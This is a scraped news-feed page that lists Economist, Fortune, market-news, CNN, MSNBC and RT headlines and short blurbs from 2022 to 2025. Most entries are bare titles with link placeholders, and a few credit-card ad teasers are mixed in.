Date of publish: Thu, 26 Sep 2024 12:00:38 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 19 Sep 2024 14:17:29 +0000

The weekly cartoon

Article link

Date of publish: Thu, 19 Sep 2024 12:42:08 +0000

Business

Article link

Date of publish: Thu, 19 Sep 2024 12:42:08 +0000

Politics

Article link

Date of publish: Thu, 19 Sep 2024 12:42:08 +0000

Business

Article link

Date of publish: Thu, 12 Sep 2024 14:00:26 +0000

The weekly cartoon

Article link

Date of publish: Thu, 12 Sep 2024 14:00:26 +0000

Politics

Article link

Date of publish: Thu, 12 Sep 2024 14:00:26 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 12 Sep 2024 11:04:36 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 05 Sep 2024 14:30:15 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 05 Sep 2024 12:56:42 +0000

Business

Article link

Date of publish: Thu, 05 Sep 2024 12:56:42 +0000

Politics

Article link

Date of publish: Thu, 05 Sep 2024 12:56:42 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 29 Aug 2024 12:50:15 +0000

Business

Article link

Date of publish: Thu, 29 Aug 2024 12:50:15 +0000

Politics

Article link

Date of publish: Thu, 29 Aug 2024 12:50:15 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 29 Aug 2024 11:18:28 +0000

Business

Article link

Date of publish: Thu, 22 Aug 2024 12:54:53 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 22 Aug 2024 12:54:53 +0000

Politics

Article link

Date of publish: Thu, 22 Aug 2024 12:54:53 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 22 Aug 2024 11:54:19 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 15 Aug 2024 14:00:50 +0000

Business

Article link

Date of publish: Thu, 15 Aug 2024 14:00:50 +0000

Politics

Article link

Date of publish: Thu, 15 Aug 2024 14:00:50 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 15 Aug 2024 14:00:21 +0000

Business

Article link

Date of publish: Thu, 08 Aug 2024 13:25:33 +0000

Politics

Article link

Date of publish: Thu, 08 Aug 2024 13:25:33 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 08 Aug 2024 10:56:55 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 08 Aug 2024 08:46:18 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 01 Aug 2024 14:58:18 +0000

Politics

Article link

Date of publish: Thu, 01 Aug 2024 14:27:21 +0000

Business

Article link

Date of publish: Thu, 01 Aug 2024 14:27:20 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 01 Aug 2024 14:27:18 +0000

Politics

Article link

Date of publish: Thu, 25 Jul 2024 13:57:40 +0000

Business

Article link

Date of publish: Thu, 25 Jul 2024 13:57:39 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 25 Jul 2024 13:57:38 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 25 Jul 2024 13:08:25 +0000

Step inside The Economist’s summer issue

A guide to what you can find in our special supplement

Article link

Date of publish: Tue, 23 Jul 2024 09:56:50 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 18 Jul 2024 15:15:04 +0000

Business

Article link

Date of publish: Thu, 18 Jul 2024 13:16:48 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 18 Jul 2024 13:16:48 +0000

Politics

Article link

Date of publish: Thu, 18 Jul 2024 13:16:48 +0000

Politics

Article link

Date of publish: Thu, 11 Jul 2024 13:57:15 +0000

Business

Article link

Date of publish: Thu, 11 Jul 2024 13:57:14 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 11 Jul 2024 13:57:13 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 11 Jul 2024 12:41:26 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 04 Jul 2024 13:11:06 +0000

Business

Article link

Date of publish: Thu, 04 Jul 2024 13:11:04 +0000

Politics

Article link

Date of publish: Thu, 04 Jul 2024 13:11:02 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 04 Jul 2024 12:30:39 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 27 Jun 2024 16:26:55 +0000

Politics

Article link

Date of publish: Thu, 27 Jun 2024 13:42:32 +0000

Business

Article link

Date of publish: Thu, 27 Jun 2024 13:42:30 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 27 Jun 2024 13:42:28 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 20 Jun 2024 15:47:01 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 20 Jun 2024 13:26:14 +0000

Business

Article link

Date of publish: Thu, 20 Jun 2024 13:26:14 +0000

Politics

Article link

Date of publish: Thu, 20 Jun 2024 13:26:14 +0000

Politics

Article link

Date of publish: Thu, 13 Jun 2024 13:55:41 +0000

Business

Article link

Date of publish: Thu, 13 Jun 2024 13:55:38 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 13 Jun 2024 13:55:35 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 13 Jun 2024 11:38:09 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 06 Jun 2024 12:54:48 +0000

Business

Article link

Date of publish: Thu, 06 Jun 2024 12:54:44 +0000

Politics

Article link

Date of publish: Thu, 06 Jun 2024 12:54:42 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 06 Jun 2024 10:30:35 +0000

Politics

Article link

Date of publish: Thu, 30 May 2024 13:11:42 +0000

Business

Article link

Date of publish: Thu, 30 May 2024 13:11:39 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 30 May 2024 13:11:36 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 30 May 2024 12:12:23 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 23 May 2024 13:26:48 +0000

Business

Article link

Date of publish: Thu, 23 May 2024 13:26:45 +0000

Politics

Article link

Date of publish: Thu, 23 May 2024 13:26:41 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 23 May 2024 11:20:02 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 16 May 2024 13:32:45 +0000

Business

Article link

Date of publish: Thu, 16 May 2024 13:32:44 +0000

Politics

Article link

Date of publish: Thu, 16 May 2024 13:32:44 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 16 May 2024 13:13:12 +0000

Politics

Article link

Date of publish: Thu, 09 May 2024 13:43:03 +0000

Business

Article link

Date of publish: Thu, 09 May 2024 13:43:02 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 09 May 2024 13:43:00 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 09 May 2024 13:34:05 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 02 May 2024 13:13:32 +0000

Business

Article link

Date of publish: Thu, 02 May 2024 13:13:30 +0000

Politics

Article link

Date of publish: Thu, 02 May 2024 13:13:28 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 02 May 2024 12:15:15 +0000

Politics

Article link

Date of publish: Thu, 25 Apr 2024 13:58:31 +0000

Business

Article link

Date of publish: Thu, 25 Apr 2024 13:58:29 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 25 Apr 2024 13:58:27 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 25 Apr 2024 10:57:55 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 18 Apr 2024 14:09:29 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 18 Apr 2024 12:56:00 +0000

Business

Article link

Date of publish: Thu, 18 Apr 2024 12:55:57 +0000

Politics

Article link

Date of publish: Thu, 18 Apr 2024 12:55:57 +0000

Politics

Article link

Date of publish: Thu, 11 Apr 2024 14:43:37 +0000

Business

Article link

Date of publish: Thu, 11 Apr 2024 14:43:35 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 11 Apr 2024 14:43:32 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 11 Apr 2024 11:36:34 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 04 Apr 2024 12:47:06 +0000

Business

Article link

Date of publish: Thu, 04 Apr 2024 12:46:58 +0000

Politics

Article link

Date of publish: Thu, 04 Apr 2024 12:46:54 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 04 Apr 2024 10:47:15 +0000

Politics

Article link

Date of publish: Wed, 27 Mar 2024 14:15:31 +0000

Business

Article link

Date of publish: Wed, 27 Mar 2024 14:15:28 +0000

KAL’s cartoon

Article link

Date of publish: Wed, 27 Mar 2024 14:15:25 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Wed, 27 Mar 2024 13:42:52 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 21 Mar 2024 14:13:03 +0000

Business

Article link

Date of publish: Thu, 21 Mar 2024 14:13:01 +0000

Politics

Article link

Date of publish: Thu, 21 Mar 2024 14:12:59 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 21 Mar 2024 13:45:21 +0000

Politics

Article link

Date of publish: Thu, 14 Mar 2024 15:13:38 +0000

Business

Article link

Date of publish: Thu, 14 Mar 2024 15:13:36 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 14 Mar 2024 15:13:33 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 14 Mar 2024 13:31:35 +0000

Business

Article link

Date of publish: Thu, 07 Mar 2024 14:15:39 +0000

Politics

Article link

Date of publish: Thu, 07 Mar 2024 14:15:35 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 07 Mar 2024 14:15:21 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 07 Mar 2024 12:39:16 +0000

Politics

Article link

Date of publish: Thu, 29 Feb 2024 14:02:40 +0000

Business

Article link

Date of publish: Thu, 29 Feb 2024 14:02:37 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 29 Feb 2024 14:02:34 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 29 Feb 2024 12:06:16 +0000

Business

Article link

Date of publish: Thu, 22 Feb 2024 13:47:41 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 22 Feb 2024 13:47:41 +0000

Politics

Article link

Date of publish: Thu, 22 Feb 2024 13:47:41 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 22 Feb 2024 13:04:23 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 15 Feb 2024 15:59:41 +0000

Business

Article link

Date of publish: Thu, 15 Feb 2024 15:59:41 +0000

Politics

Article link

Date of publish: Thu, 15 Feb 2024 15:59:41 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 15 Feb 2024 13:13:20 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 08 Feb 2024 14:40:12 +0000

Politics

Article link

Date of publish: Thu, 08 Feb 2024 14:40:12 +0000

Business

Article link

Date of publish: Thu, 08 Feb 2024 14:40:12 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 08 Feb 2024 11:53:46 +0000

Business

Article link

Date of publish: Thu, 01 Feb 2024 14:28:43 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 01 Feb 2024 14:28:43 +0000

Politics

Article link

Date of publish: Thu, 01 Feb 2024 14:28:43 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 01 Feb 2024 13:42:54 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 25 Jan 2024 14:21:46 +0000

Politics

Article link

Date of publish: Thu, 25 Jan 2024 14:21:46 +0000

Business

Article link

Date of publish: Thu, 25 Jan 2024 14:21:46 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 25 Jan 2024 13:58:46 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 18 Jan 2024 15:15:18 +0000

Business

Article link

Date of publish: Thu, 18 Jan 2024 15:02:48 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 18 Jan 2024 15:02:48 +0000

Politics

Article link

Date of publish: Thu, 18 Jan 2024 15:02:48 +0000

This week’s covers

How we saw the world

Article link

Date of publish: Thu, 11 Jan 2024 16:25:25 +0000

KAL’s cartoon

Article link

Date of publish: Thu, 11 Jan 2024 13:57:26 +0000

Business

Article link

Date of publish: Thu, 11 Jan 2024 13:57:26 +0000

Politics

Article link

Date of publish: Thu, 11 Jan 2024 13:57:26 +0000

This week’s cover

How we saw the world

Article link

Date of publish: Thu, 04 Jan 2024 14:43:30 +0000

Fortune | FORTUNE

Bitcoin and crypto investors hit with flood of IRS letters, say tax experts

Crypto tax platform CoinLedger cites a ninefold increase in users asking about IRS letters.

Article link

Date of publish: Sun, 29 Jun 2025 13:40:36 +0000

Serena Williams says talent alone only gets you so far: For career success, like tennis, you have to grind ‘every day’

The 43-year-old tennis icon says humility and perseverance are key to success, echoing other leaders like Brian Niccol, Steve Jobs, and Mark Cuban.

Article link

Date of publish: Mon, 30 Jun 2025 14:39:21 +0000

Falling home prices are raising the risk of a deeper correction as the housing market cracks under high mortgage rates

The latest Case-Shiller home price report showed a 0.3% monthly fall in the 20-city index in April, steeper than March's downwardly revised 0.2% dip.

Article link

Date of publish: Sat, 28 Jun 2025 19:45:26 +0000

‘Twilight’ superfans bought Bella Swan’s house for $360,000—now they get $140,000 a year in gross revenue renting out the ultimate collector’s item

"Twilight" captured the hearts of millennials in 2008. Now, 17 years since its release, its fans are all grown up with "big-boy money"—and one couple is crashing Airbnb with the listing.

Article link

Date of publish: Sun, 29 Jun 2025 11:03:00 +0000

GoFundMe launches new funds aimed at maximizing charitable donations

GoFundMe is launching Giving Funds, a type of donor-advised fund.

Article link

Date of publish: Mon, 30 Jun 2025 12:59:38 +0000

Zohran Mamdani doesn’t think there should be billionaires but would work with them as NYC mayor and denies being a communist

"I don't think that we should have billionaires, because, frankly, it is so much money in a moment of such inequality," Mamdani said.

Article link

Date of publish: Sun, 29 Jun 2025 19:17:24 +0000

How this CEO built a 35-year reign at Aflac without burning out

Aflac’s Dan Amos has outlasted market cycles, activist investors, and generational change

Article link

Date of publish: Mon, 30 Jun 2025 12:59:00 +0000

87% of business leaders think AI agents will replace human employees if companies don’t make big moves to upskill their workforce

“As employers, we have a responsibility to help prepare current and future workers for the transition to a new era of work.”

Article link

Date of publish: Mon, 30 Jun 2025 12:40:02 +0000

‘A strange calm’ has settled over the markets as investors ignore the risks ahead

Investors appear to be expecting either a tariff deadline extension or Federal Reserve rate cuts to support stocks. 

Article link

Date of publish: Mon, 30 Jun 2025 10:38:39 +0000

New York’s tech elite are melting down over the election of Zohran Mamdani. Is the city destined for a San Francisco-style rebellion? 

Tyler Winklevoss and Garry Tan joined in the chorus decrying the victory of the 33-year-old socialist.

Article link

Date of publish: Mon, 30 Jun 2025 11:45:00 +0000

All News

FX-hedged stocks seen outperforming as euro rises, says Morgan Stanley

Article link

Date of publish: 2025-06-30 14:36:24

Wolfe upgrades Medtronic as pulsed field ablation may jolt near term growth

Article link

Date of publish: 2025-06-30 14:29:25

Bitcoin price today: erases gains after briefly rising near $109k; up 3.5% in June

Article link

Date of publish: 2025-06-30 14:08:48

Cantor bullish on SailPoint as machine identity push to extend growth runway

Article link

Date of publish: 2025-06-30 14:06:16

Apple stock: Analyst flags AI concerns, warns of downside risk ahead of earnings

Article link

Date of publish: 2025-06-30 14:05:24

Supreme Court rejects American Airlines appeal over JetBlue deal

Article link

Date of publish: 2025-06-30 13:53:02

U.S. stocks rise on trade, rate cut optimism; set for hefty monthly gains

Article link

Date of publish: 2025-06-30 13:36:17

Analysts initiate Circle, some cautious on lofty valuation amid stablecoin boom

Article link

Date of publish: 2025-06-30 13:22:07

RBC survey sees solid global outlook but flags U.S. policy risks

Article link

Date of publish: 2025-06-30 13:20:40

Consumer plans for electronics purchases dip amid mixed sentiment: survey

Article link

Date of publish: 2025-06-30 13:14:04

Saudi Arabia's PIF reports 60% profit drop in 2024

Article link

Date of publish: 2025-06-30 13:06:05

New S&P 500 high raises questions on longevity - Sevens Report

Article link

Date of publish: 2025-06-30 12:53:26

Bond yields and U.S. dollar to continue moving lower: JPM

Article link

Date of publish: 2025-06-30 12:53:10

Oracle stock rises 7% after CEO touts strong start to fiscal year

Article link

Date of publish: 2025-06-30 12:49:18

Santander among bidders for Sabadell's TSB unit

Article link

Date of publish: 2025-06-30 12:42:45

Stifel lifts Oracle stock rating on durable cloud gains

Article link

Date of publish: 2025-06-30 12:32:26

Jefferies initiates Zalando at “buy,” cites margin upside and platform growth

Article link

Date of publish: 2025-06-30 12:32:10

Oil prices stable; OPEC+ output hike in focus

Article link

Date of publish: 2025-06-30 12:27:47

Second-quarter earnings should provide insight into tariff impact - Goldman Sachs

Article link

Date of publish: 2025-06-30 12:21:05

Hospital shares slide as latest Senate version seen 'worse' than anticipated

Article link

Date of publish: 2025-06-30 12:15:17

Goldman Sachs initiates Leonardo DRS with “buy” on growth, margin upside

Article link

Date of publish: 2025-06-30 11:58:55

William Blair urges tactical view on Tesla stock as robotaxi story builds

Article link

Date of publish: 2025-06-30 11:50:59

RBC says Lilly could blaze trail and Biogen could pull ahead in Alzheimer’s market

Article link

Date of publish: 2025-06-30 11:48:52

INmune Bio stock plummets after mixed Phase 2 Alzheimer's trial results

Article link

Date of publish: 2025-06-30 11:46:46

Nvidia, JPMorgan and Walt Disney rise premarket; Tesla, Stellantis fall

Article link

Date of publish: 2025-06-30 11:44:47

FTSE 100 today: Index lower, pound tops $1.37, defense stocks gain

Article link

Date of publish: 2025-06-30 11:42:07

Senate budget bill may be "good news" for this solar stock, Wolfe Research says

Article link

Date of publish: 2025-06-30 11:38:07

Palantir stock rises after Russell rebalancing selloff

Article link

Date of publish: 2025-06-30 11:36:05

Gilead extends gains after Supreme Court upheld an Obamacare provision

Article link

Date of publish: 2025-06-30 11:25:34

Centrica downgraded to “neutral” by J.P. Morgan amid limited upside

Article link

Date of publish: 2025-06-30 11:23:41

S&P 500 to continue rallying on expected Fed rate cuts: Morgan Stanley's Wilson

Article link

Date of publish: 2025-06-30 11:18:34

Boeing deal for Spirit AeroSystems faces U.K. antitrust probe

Article link

Date of publish: 2025-06-30 11:18:10

Exclusive: Datagram unveils closure of $4mn pre-seed funding round

Article link

Date of publish: 2025-06-30 11:02:40

Morgan Stanley upgrades Allegro to “overweight,” price target raised

Article link

Date of publish: 2025-06-30 11:01:44

TSX futures inch up after Canada rescinds digital services tax

Article link

Date of publish: 2025-06-30 11:00:08

Senate budget plan 'very bearish' for renewables, says Morgan Stanley

Article link

Date of publish: 2025-06-30 10:53:47

Dow Jones, Nasdaq, S&P 500 weekly preview: Fed policy in focus as stocks hit ATH

Article link

Date of publish: 2025-06-30 10:37:41

Jefferies upgrades Holcim to “buy,” initiates Amrize at “hold” post spin-off

Article link

Date of publish: 2025-06-30 10:31:57

U.S. bank stocks rise after Fed stress test results

Article link

Date of publish: 2025-06-30 10:30:17

Gold prices edge higher; trade deal hopes limit gains

Article link

Date of publish: 2025-06-30 10:10:11

HPE, Juniper shares surge on settled DoJ antitrust case

Article link

Date of publish: 2025-06-30 10:04:20

UBS downgrades Galderma to “neutral” on valuation concerns, softer aesthetics

Article link

Date of publish: 2025-06-30 09:56:28

Deceleration in U.S., global economy from tariffs has yet to "play out" - MS

Article link

Date of publish: 2025-06-30 09:48:17

RBC upgrades Materials, cuts Discretionary in sector reshuffle

Article link

Date of publish: 2025-06-30 09:40:35

EU green energy firms hit as U.S. slashes wind and solar tax breaks

Article link

Date of publish: 2025-06-30 09:32:20

Tesla expected to unveil Q2 deliveries this week as Musk touts driverless tech

Article link

Date of publish: 2025-06-30 09:17:40

TT Electronics shares fall 6% after revenue drop, Texas site closure plan

Article link

Date of publish: 2025-06-30 08:56:41

Five things to watch in markets in the week ahead

Article link

Date of publish: 2025-06-30 08:53:12

U.K. defense stocks gain as U.K.-U.S. trade deal takes effect

Article link

Date of publish: 2025-06-30 08:49:45

UBS shuffles private equity sector, upgrades 2 names

Article link

Date of publish: 2025-06-30 08:33:20

Centrica downgraded to “neutral” by J.P. Morgan on limited upside

Article link

Date of publish: 2025-06-30 08:30:38

Dollar retreats on rate cut optimism; euro close to multi-year high

Article link

Date of publish: 2025-06-30 08:14:15

These AI-picked winners are up a massive 100%+ this year ALONE

Article link

Date of publish: 2025-06-30 08:00:41

Deutsche Bank turns bullish on European real estate, lists top picks

Article link

Date of publish: 2025-06-30 07:59:27

WH Smith shares drop 5% after revising High Street sale terms

Article link

Date of publish: 2025-06-30 07:56:00

TomTom to cut 300 jobs in restructuring tied to product-led strategy shift

Article link

Date of publish: 2025-06-30 07:41:14

Futures higher, Canada scraps digital services tax - what's moving markets

Article link

Date of publish: 2025-06-30 07:38:09

Deutsche Bank retains positive view on European utilities, upgrades 2 stocks

Article link

Date of publish: 2025-06-30 07:30:27

Goldman Sachs downgrades Moncler to “neutral” on weak retail outlook

Article link

Date of publish: 2025-06-30 07:12:28

European stocks rise on trade optimism; German retail sales slump

Article link

Date of publish: 2025-06-30 07:06:14

JPMorgan puts STMicro, Infineon on positive catalyst watch

Article link

Date of publish: 2025-06-30 06:54:16

Polar Capital posts strong core profit despite AUM dip, CEO Rochussen to retire

Article link

Date of publish: 2025-06-30 06:42:20

Jefferies upgrades Disney to “buy,” raises price target to $144

Article link

Date of publish: 2025-06-30 06:17:34

Japan’s Metaplanet raises Bitcoin holdings to 13,350 coins

Article link

Date of publish: 2025-06-30 06:10:07

Strong U.K. growth confirmed in first quarter; GDP rose 0.7%

Article link

Date of publish: 2025-06-30 06:08:27

U.S.-UK trade deal takes effect; steel exemption deadline looms

Article link

Date of publish: 2025-06-30 05:07:33

Chinese chipmaking stocks rise amid Taiwan export row, US tech cheer

Article link

Date of publish: 2025-06-30 04:46:49

Canada rescinds digital services tax to revive US trade talks; eyes July 21 deal

Article link

Date of publish: 2025-06-30 04:04:35

Asia FX firms amid positive Chinese PMIs; dollar weak on rate cut speculation

Article link

Date of publish: 2025-06-30 03:35:23

Australia's Superloop jumps to near 9-yr high on upgraded earnings forecast

Article link

Date of publish: 2025-06-30 03:27:01

Asia stocks head for monthly gains on US trade deal hopes; Nikkei hits 1-yr high

Article link

Date of publish: 2025-06-30 02:54:02

Australia sees lower commodity export earnings; Rio, BHP shares decline

Article link

Date of publish: 2025-06-30 01:47:03

China manufacturing PMI shrinks in June as tariff headwinds persist

Article link

Date of publish: 2025-06-30 01:40:13

Trump says he has ‘group of very wealthy people’ ready to buy TikTok

Article link

Date of publish: 2025-06-30 00:47:11

Japan factory output rises less than expected in May amid tariff concerns

Article link

Date of publish: 2025-06-30 00:26:53

Nvidia insiders sold over $1 bln stock in past year- FT

Article link

Date of publish: 2025-06-30 00:20:15

Trump tax-cut bill advances in Senate; analysis sees $3.3 trln price tag

Article link

Date of publish: 2025-06-30 00:06:54

Will AI demand be sufficient to justify the infrastructure investment?

Article link

Date of publish: 2025-06-29 10:30:02

5 big analyst AI moves: Microsoft, Amazon, Tesla PT hikes; AMD, Broadcom upgraded

Article link

Date of publish: 2025-06-29 10:00:08

AI may revive U.S. e-commerce growth

Article link

Date of publish: 2025-06-29 10:00:05

RBC says it is seeing "healthy" investor interest in gold stocks

Article link

Date of publish: 2025-06-29 10:00:02

Everything you wanted to know about S&P Global but were too afraid to ask

Article link

Date of publish: 2025-06-29 09:30:02

Street Calls of the Week

Article link

Date of publish: 2025-06-29 09:15:30

Structural shifts in Europe's credit ecosystem

Article link

Date of publish: 2025-06-29 09:05:01

How is META TikTok Disruption an Analog for GOOG vs GPT?

Article link

Date of publish: 2025-06-29 09:00:04

"Peace" in the Middle East, but "War" at the Fed - Macquarie

Article link

Date of publish: 2025-06-29 09:00:02

Walmart’s digital momentum signals long-term profit growth: Morgan Stanley

Article link

Date of publish: 2025-06-29 08:30:04

How might India push back against Chinese imports? Capital Economics weighs in

Article link

Date of publish: 2025-06-29 08:30:02

China’s housing pain could extend to 2027 without more stimulus - Goldman Sachs

Article link

Date of publish: 2025-06-29 08:00:09

Investment intentions for warehouse automation remain strong: UBS

Article link

Date of publish: 2025-06-29 08:00:06

Politics RSS

Political sites below.

CNN.com - RSS Channel - Politics

How Kyrsten Sinema's decision makes Democrats' 2024 Senate map tighter

Arizona Sen. Kyrsten Sinema decided to shake up the political world on Friday by becoming an independent. The former Democrat is still caucusing with the party in the Senate, so the Democratic caucus still has 51 members. Now, instead of 49 Democrats and two independents within their ranks, the caucus has 48 Democrats and three independents.

Article link

Date of publish: Sat, 10 Dec 2022 17:24:17 GMT

Meet the woman steering Biden's bipartisan winning streak on Capitol Hill

The Biden administration managed to rack up a long list of major legislative wins in its first two years despite facing one of the most closely-divided Congresses in history. From bipartisan action on infrastructure, gun safety and same-sex marriage to party-line bills tackling climate change and expanding health care coverage, it's a record President Joe Biden and Democrats on the ballot were all eager to tout on the campaign trail during the midterms.

Article link

Date of publish: Sun, 11 Dec 2022 16:16:48 GMT

CNN Political Briefing

The political news you need to know, in 10 minutes or less. Hosted by David Chalian.

Article link

MSNBC Top Stories

‘Inner city rats’: Alabama’s Tommy Tuberville adds to his ugly record on race

Right-wing Sen. Tommy Tuberville of Alabama already had an indefensible record on race. Then he started talking about "inner-city rats."

Article link

Date of publish: Mon, 30 Jun 2025 13:30:28 GMT

Why a new nationwide boycott of McDonald’s feels like just deserts

The People’s Union organized a weeklong boycott against McDonald's months after the company rolled back many of its well-known DEI initiatives.

Article link

Date of publish: Sun, 29 Jun 2025 10:00:40 GMT

Suspected gunman found dead after fatal shooting of Idaho firefighters

Two firefighters were shot and killed as they responded to a brush fire near Coeur d’Alene, Idaho, authorities said. One other wounded firefighter was out of surgery and stable at a Coeur d'Alene hospital late Sunday.

Article link

Date of publish: Mon, 30 Jun 2025 10:05:36 GMT

RT - Daily news

ChatGPT triggers psychosis – media

Preview The AI bot’s tendency to affirm users’ beliefs has been found to reinforce harmful delusions, according to a report
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 14:05:33 +0000

Vocal critic of West seeks reelection as Ugandan leader

Preview Yoweri Museveni says he aims to expand Uganda’s economy to $500 billion in five years if reelected
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 14:04:51 +0000

Apple Music partially restores sanctioned Russian artists

Preview The platform has brought back the profiles of the likes of Shaman and Polina Gagarina
Read Full Article at RT.com

Article link

Date of publish: Mon, 30 Jun 2025 13:35:44 +0000

CNN.com - RSS Channel - Politics

How Kyrsten Sinema's decision makes Democrats' 2024 Senate map tighter

Arizona Sen. Kyrsten Sinema decided to shake up the political world on Friday by becoming an independent. The former Democrat is still caucusing with the party in the Senate, so the Democratic caucus still has 51 members. Now, instead of 49 Democrats and two independents within their ranks, the caucus has 48 Democrats and three independents.

Article link

Date of publish: Sat, 10 Dec 2022 17:24:17 GMT

Meet the woman steering Biden's bipartisan winning streak on Capitol Hill

The Biden administration managed to rack up a long list of major legislative wins in its first two years despite facing one of the most closely-divided Congresses in history. From bipartisan action on infrastructure, gun safety and same-sex marriage to party-line bills tackling climate change and expanding health care coverage, it's a record President Joe Biden and Democrats on the ballot were all eager to tout on the campaign trail during the midterms.

Article link

Date of publish: Sun, 11 Dec 2022 16:16:48 GMT

CNN Political Briefing

The political news you need to know, in 10 minutes or less. Hosted by David Chalian.

Article link

The Axe Files with David Axelrod

Go beyond the soundbites and get to know some of the most interesting players in politics.

Article link

Margins of Error

Look closely at almost anything and you'll find data—lots of it. But what are those numbers really saying about who we are and what we believe? Harry Enten is on a mission to find out.

Article link

The notable legal clouds that continue to hang over Donald Trump

All eyes are on former President Donald Trump, who has launched another White House bid.

Article link

Date of publish: Thu, 08 Dec 2022 03:36:24 GMT

The fine print of the Respect for Marriage Act

Let's start with the positive: Republicans and Democrats are coming together to protect same-sex marriage from the Supreme Court.

Article link

Date of publish: Tue, 29 Nov 2022 23:32:13 GMT

Everything you need to know about Biden's student loan forgiveness program

President Joe Biden's federal student loan forgiveness program, which promises to deliver up to $20,000 of debt relief for millions of borrowers, is on hold indefinitely as legal challenges work their way through the courts.

Article link

Date of publish: Tue, 13 Jun 2023 20:58:58 GMT

Politics of the Day

Politics of the Day

Article link

Date of publish: Fri, 14 Jun 2024 04:13:26 GMT

0% intro APR until 2024 is 100% insane
It's official: now avoid credit card interest into 2024
Experts: this is the best cash back card of 2022
Turn Your Rising Home Equity Into Cash You Can Use
Dream Big with a Home Equity Loan
Want Cash Out of Your Home? Here Are Your Best Options
Use the Right Card for Holiday Gifts (Save Hundreds on Interest)
10 Cards Charging 0% Interest Until 2024
Get a $200 Cash Back Bonus on Holiday Gift Buying
Array

Vice President Kamala Harris, a former US senator from California who previously served as the state's attorney general, could be the first Black woman and Asian American to lead a major party ticket after receiving President Joe Biden's support to become the next Democratic presidential nominee.

Article link

Array

Fareed explains why AI's massive energy demands are straining the power grid, but also why AI could enable big breakthroughs in sustainability and clean energy.

Article link

Array

In the wake of the Republican National Convention earlier this month, Fareed speaks with historian Niall Ferguson about how and why the modern-day GOP has changed since the Reagan era of the 1980s.

Article link

Array

Fareed speaks with New York Times opinion columnist Ezra Klein about the significance of Vice President Kamala Harris' early career as a prosecutor — and how it may affect her campaign.

Article link

Array

New York Times opinion columnist Ezra Klein speaks with Fareed about the effects of President Joe Biden's decision to not seek reelection — and whether Vice President Kamala Harris can reshape the race.

Article link

Array

CNN Senior Political Commentator Scott Jennings and Political Commentators Kristen Soltis Anderson, Jamal Simmons and Kate Bedingfield tell CNN's Jake Tapper who they think should join Vice President Kamala Harris' ticket and with 100 days until election day, the state of the 2024 presidential race.

Article link

Array

On CNN's State of the Union, Republican Sen. Tom Cotton criticizes Harris' comments on the war in Gaza and calls her a "San Francisco liberal who cannot keep this country safe."

Article link

Array

Years before he became president, many Americans first met Barack Obama during the 2004 Democratic National Convention.

